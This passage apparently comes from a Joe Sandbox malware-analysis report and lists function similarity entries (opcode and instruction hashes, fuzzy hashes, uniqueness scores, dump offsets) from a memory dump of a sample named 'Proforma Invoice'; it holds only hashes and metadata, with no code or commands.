• Opcode ID: d30d58beebb4766e490ba33f35a03caebddb130983c4b4a27231ecfbfb8c71ab
• Instruction ID: e0994d2c16f75caf57c22e40715e2b99370e4b5e8a84c4588d737d794583dd4e
• Opcode Fuzzy Hash: d30d58beebb4766e490ba33f35a03caebddb130983c4b4a27231ecfbfb8c71ab
• Instruction Fuzzy Hash: CF11D331A402499FDB50EF7CC884BAEBBE2AF85320F048755DA195B293D372EC10CB94
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e089745df722c184160735b01be9af5cda033c6a8f548a132e68c376a60a0f2a
• Instruction ID: 0b69e20aeb121d742921e3ee0a56d786898fa9a226929e929adb2f3b43f16c9b
• Opcode Fuzzy Hash: e089745df722c184160735b01be9af5cda033c6a8f548a132e68c376a60a0f2a
• Instruction Fuzzy Hash: D1111834F102189F8B80EF6CD8599AEBBF6FB8D2107108939E51AD3354EB349D05CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3f55926c171cfe11bde48e9688a06067c82735f9e06e39fdc5db86ad7bf79717
• Instruction ID: 955917bcf4aca04d50af051bea71ac32bd9bb1b4bb08ebc153214c625bbeb3d2
• Opcode Fuzzy Hash: 3f55926c171cfe11bde48e9688a06067c82735f9e06e39fdc5db86ad7bf79717
• Instruction Fuzzy Hash: C1018178A11208EFCB80FFB4E56545C7BB1BF55204B4045A8D809E7390EB319E88CB51
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a58f7e9c7e715d8e9ed726110f287d8ab7951f9fcf1662d1c7d60c6ac5cd91e3
• Instruction ID: 16233db66dcb7a959433cc00040ee0c3ef7b8f93b9add881852c9c05000fb9ea
• Opcode Fuzzy Hash: a58f7e9c7e715d8e9ed726110f287d8ab7951f9fcf1662d1c7d60c6ac5cd91e3
• Instruction Fuzzy Hash: 97F0BE392002089BD710BF64E890CAA37AAEFC83557018435E5018B311DF79CC01DBD0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3947500eca12b1915aed944922b4132bca7f4ee4be2a70ac59226e7a312698ee
• Instruction ID: e5a4b494aff148696c31bb842862dd306017a40d37debd78b426f50f2a224504
• Opcode Fuzzy Hash: 3947500eca12b1915aed944922b4132bca7f4ee4be2a70ac59226e7a312698ee
• Instruction Fuzzy Hash: FCF0A9392002099FCB10BF29E480CAA37AAEFC92693418439E6008B315DBB5EC41DBD0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c34d50a99cfb7f20ee2e81fe6cff4baf70e190785fd9b2d9cb514ac93754a460
• Instruction ID: 752ce48ba208f2a0896791eb5ef60c61e05272d2d5e358f6a8dc58ac9445331c
• Opcode Fuzzy Hash: c34d50a99cfb7f20ee2e81fe6cff4baf70e190785fd9b2d9cb514ac93754a460
• Instruction Fuzzy Hash: 19E06572E401159F8B90EEBD98492AE7BFCEA88121F44457AE919D3304EA708A15C7E1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e33b9642a647e1bd7630e799d8fdc68555f6d7df2728f83f5868af90ea1d8ee6
• Instruction ID: a43c0e5f345fbcd2a4b07aba38d2e6a1397bb925c45c4ec0af1369cb87a7b039
• Opcode Fuzzy Hash: e33b9642a647e1bd7630e799d8fdc68555f6d7df2728f83f5868af90ea1d8ee6
• Instruction Fuzzy Hash: E2E0C239F102189FCF44EBA8E95889CB7F1BF8D2257008475EA1AE3354EE349C11CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2a9a3544cbec531431163a9d3a68a09c03d3d1498d31722c5af2af81661de2c7
                                                                                                    • Instruction ID: ad01196cdfc8b25d1f6061958524d2661a0fb0abd31b7c5bae9e14cee71e8b0f
                                                                                                    • Opcode Fuzzy Hash: 2a9a3544cbec531431163a9d3a68a09c03d3d1498d31722c5af2af81661de2c7
                                                                                                    • Instruction Fuzzy Hash: 91E01272F001199F4B80EBBD98055AE7FF8EA88211B154476E50DD3304EA704A118BE1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 35b102d3cef58f211cf079a7abb127aa6a90ba64f48eea6ac0c0eeff6dd733af
                                                                                                    • Instruction ID: cffa0f5823192ff2706246e18d143ce2e4cd3a4ca6c9fc4793fd0f3eb5cbb73c
                                                                                                    • Opcode Fuzzy Hash: 35b102d3cef58f211cf079a7abb127aa6a90ba64f48eea6ac0c0eeff6dd733af
                                                                                                    • Instruction Fuzzy Hash: D7F0C079D00108EBCB51DFF0D9955DDBBB5EB88301F1085AA9415A2240EA355B55DF80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9fb4e5c90a860b566865e3beb7435fcb651d6fe7e936732b4aa4de2528af6337
                                                                                                    • Instruction ID: b61ec4fbd39057f6e7a6c511bb9918c26efe37484234facc70668034ff9d7d3f
                                                                                                    • Opcode Fuzzy Hash: 9fb4e5c90a860b566865e3beb7435fcb651d6fe7e936732b4aa4de2528af6337
                                                                                                    • Instruction Fuzzy Hash: 5DE09A75D0020CEFCB41DFE4D5558DDBBB5FB48201F1081A6D805A3240EB345B55DF81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%